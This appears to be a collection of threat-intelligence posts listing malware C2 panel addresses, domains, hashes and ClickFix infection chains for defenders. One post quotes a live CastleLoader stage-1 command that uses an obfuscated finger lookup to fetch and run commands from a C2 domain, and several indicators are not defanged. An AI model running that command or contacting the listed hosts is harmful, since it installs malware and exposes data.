Over the 10k #malware C2 panels on tracker.viriback.com

204.10.194[.239 @500mk500 @ViriBack @skocherhan @BlinkzSec @JAMESWT_WT @malwrhunterteam #SessionStealer #C2 #panel #ThreatIntel #CTI #BlueTeam Strictly for defensive purpose

LKM C2 103.214.174.248:8443 45.91.81.190:8443 108.61.193.37:8443 45.91.81.112

From #clickfix to #stealc app.any.run/tasks/9cd9a0f0-b… c2: https://pas.canamrent\.com/ cc @k3dg3

Some panel with title "C2 Panel — Login": https://larpers[.]fun/login "C2 PANEL Command & Control Interface" 🤷‍♂️ @1ZRR4H

34.61.206[.]224 officeemail[.]ru @500mk500 @ViriBack @skocherhan @AndreGironda @BlinkzSec @JAMESWT_WT @malwrhunterteam #Stealth #C2 #ControlPanel #panel #ThreatIntel #CTI #BlueTeam strictly for defensive purpose

154.12.236[.]54[:]5000 chaarlottte[.]dev 20056e47d2b3c00e22ff86ba3a7349994112d188fa5045d12b6eb56cd314fbca @500mk500 @ViriBack @skocherhan @AndreGironda @BlinkzSec @JAMESWT_WT @malwrhunterteam @abuse_ch #C2 #panel #ThreatIntel #CTI #BlueTeam For defensive purpose

Fake Microsoft Teams download page using a ClickFix-style fake Chrome update to trick users into executing a malicious PowerShell command. The payload downloads Node.js, executes an obfuscated Update.js file, and establishes persistence using a fake “Microsoft Edge Updates Helper”. IOCs: teams-net-calls[.]com instantwebupdate[.]com #ClickFix #Phishing #Malware #PowerShell @malwrhunterteam @500mk500

A few C2 Panels I dont know what they are... 176.174.36[.]147/ s://167.235.228[.]178/auth/login s://45.80.188[.]4:8081/login 31.57.201[.]43:5000/login

#XLoader v0.6.8 👇 http://www.apartuk.]info/hpum/index.php?account=w4naf290 👇 bazaar.abuse.ch/browse/tag/w…

Lucid Stealer being promoted on telegram Panels: 85[.239.155.68 ghdfhfjhfg[.webhop.me iloveyoulucid[.space 0kt[.one storedonutsmp[.net lucidstealer[.one

During our routine threat hunting activities, we detected a new active #ClickFix campaign. Typical; what initially appears to be "robot verification" is actually direct malware distribution. ATTACK CHAIN 1️) Fake verification page → 151.243.18[.]254 2️) User is prompted to run a PowerShell command 3️) The Base64 encoded command script is decoded and connected to C2 → 94.26.83[.]199 4️) Payload is downloading → /download CRITICAL POINTS - The file name changes with each download: "imagetransfer.exe", "audiobackup.exe", "archive_report.exe", "new-photo.exe" - Each downloaded file has a different name but the same SHA256 hash - TLS SNI Camouflage: "ecs.office.com", "cdn.steamstatic.com" TECHNICAL BEHAVIORS Base64 encoding, obfuscation, payload download via PowerShell, %TEMP% drop, silent execution with "-WindowStyle Hidden", console hiding, runtime parsing (GetProcAddress) CAPABILITIES Persistence (registry startup), clipboard data collection, webcam access, file system discovery, command execution. #IOCs IPs: 151.243.18[.]254, 94.26.83[.]199 Paths: /check, /download Hash (SHA256): 7d3654531c32d941b8cae81c4137fc542172bfa9635f169cb392f245a0a12bcb Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run #threathunting #malwareanalysis #powershell #blueteam #soc #dfir #ioc #cyberthreat #cyberthint

193.169.240[.81 GhostDesk HVNC Control panel @500mk500 @ViriBack @AndreGironda @skocherhan @JAMESWT_WT @BlinkzSec #ThreatIntel #CTI #BlueTeam #GhostDesk #HVNC #C2 #Control #Panel Shared strictly for defensive and research purpose

"L0G1N - D4R7H V4D3R": http://65.109.55[.]181:8181/login "4CC3SS D3N13D - 1D3NT1FY Y0URS3LF" "0P3R4D0R" "S3NH4" With such texts, it must be the panel of some sophisticated, complex, APT's malware, right? 😂 🤷‍♂️ @1ZRR4H

Unknown C2

#govti v4 added extractor sample: tria.ge/260508-r267rsdy3m/ more samples tria.ge/s/family:govti

Finger protocol LOLBin #ClickFix campaign that uses fake AI tools, background removers and LinkedIn lures and injects “finger <username> @ C2” with 12 lure domains containing fake reCAPTCHA, 6 Finger usernames and 6 rotating C2 domains. Details at: bit.ly/3Rmc4Pl

Some panel named phantom: http://194.59.31[.]192:8443/ "command and control" 🤷‍♂️

165.245.250.220 RedSun C2 @500mk500 @ViriBack @AndreGironda @skocherhan @JAMESWT_WT @BlinkzSec @banthisguy9349 @BreakGlassIntel #RedSun #C2 #Panel #CTI

> ClickFix -> CastleLoader -> CastleBot using Finger LOLBin > Stage 1 > "C:\WINDOWS\system32\cmd.exe" /c start "" /min for /f "skip=18 delims=" %T in ('f^^i^^n^^g^^e^^r NjoDPATzUB@cheeshoumreciple.]com') do %T & echo > 38.146.25.]206 #malware #clickfix #castleloader #castlebot

Some panel with title "SPIDY C2 - Secure Login": https://vayusena[.]online/login "Secure Command & Control Interface" Looks more laughable (especially with the "256-bit AES Encrypted Session" text) than some real serious thing, but still possible interesting... 🤷‍♂️